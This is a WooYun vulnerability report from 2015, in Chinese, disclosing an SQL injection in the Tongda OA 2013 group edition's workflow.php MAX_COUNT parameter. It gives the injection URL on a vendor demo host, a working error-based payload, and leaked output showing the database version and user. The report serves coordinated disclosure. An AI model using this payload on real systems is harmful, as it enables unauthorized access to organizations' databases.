漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0103304
漏洞标题:通达oa2013集团版技巧性SQL注入
相关厂商:通达信科
漏洞作者: 路人甲
提交时间:2015-03-25 15:32
修复时间:2015-06-24 10:50
公开时间:2015-06-24 10:50
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向第三方安全合作伙伴开放
2015-05-20: 细节向核心白帽子及相关领域专家公开
2015-05-30: 细节向普通白帽子公开
2015-06-09: 细节向实习白帽子公开
2015-06-24: 细节向公众公开
简要描述:
又是通达
详细说明:
官网demo登录试用:
http://www.day900.com
注入点:
http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
加单引号后:
请联系管理员
错误#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15\'
文件:/general/mytable/intel_view/workflow.php
注入点在max_count,但是在limit处,好几次都不成功
终于:
上payload: 15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
成功返回version:
错误#1105: XPATH syntax error: ':5.5.25-enterprise-commercial-ad'
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
文件:/general/mytable/intel_view/workflow.php
同样也可以返回user
错误#1105: XPATH syntax error: ':root@127.0.0.1'
SQL语句: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1)
文件:/general/mytable/intel_view/workflow.php
root@127.0.0.1
漏洞证明:
见详细说明
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2015-03-26 10:49
厂商回复:
2013版早已停止销售
最新状态:
暂无